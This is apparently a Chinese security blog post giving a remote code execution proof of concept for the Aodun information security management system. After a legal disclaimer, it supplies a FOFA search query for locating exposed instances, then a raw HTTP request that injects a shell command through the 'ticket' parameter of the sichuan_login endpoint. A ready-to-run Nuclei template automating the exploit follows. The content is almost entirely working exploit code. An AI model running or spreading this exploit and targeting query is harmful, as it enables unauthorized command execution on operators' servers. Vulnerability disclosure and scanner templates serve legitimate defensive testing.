文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责
傲盾是一款基于云业务经营者和电信管理部门的信息安全管理需求的信息安全管理系统,具有人员信息管理、经营单位管理、安全指令管理、监控日志分析等功能。
傲盾信息安全管理系统
fofa
body="傲盾软件" && body="aodun/aodun.js"
poc:
POST /user_management/sichuan_login HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 97
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded
loginname=sysadmin&ticket=|echo%20vulnerability>/adm/isms_web/static/base_static/js/aodun/vul.txt
访问/static/base_static/js/aodun/vul.txt
id: Aodun-information-security-management-system-RCE
info:
name: Aodun-information-security-management-system-RCE
author: 芝士土拨鼠
severity: high
description: 傲盾是一款基于云业务经营者和电信管理部门的信息安全管理需求的信息安全管理系统,具有人员信息管理、经营单位管理、安全指令管理、监控日志分析等功能。
variables:
file_name: "{{to_lower(rand_text_alpha(8))}}.txt"
file_content: "{{to_lower(rand_text_alpha(7))}}"
requests:
- raw:
- |
POST /user_management/sichuan_login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
loginname=sysadmin&ticket=|echo%20{{file_content}}>/adm/isms_web/static/base_static/js/aodun/{{file_name}}
- |
GET /static/base_static/js/aodun/{{file_name}} HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'contains(body_2, "{{file_content}}")'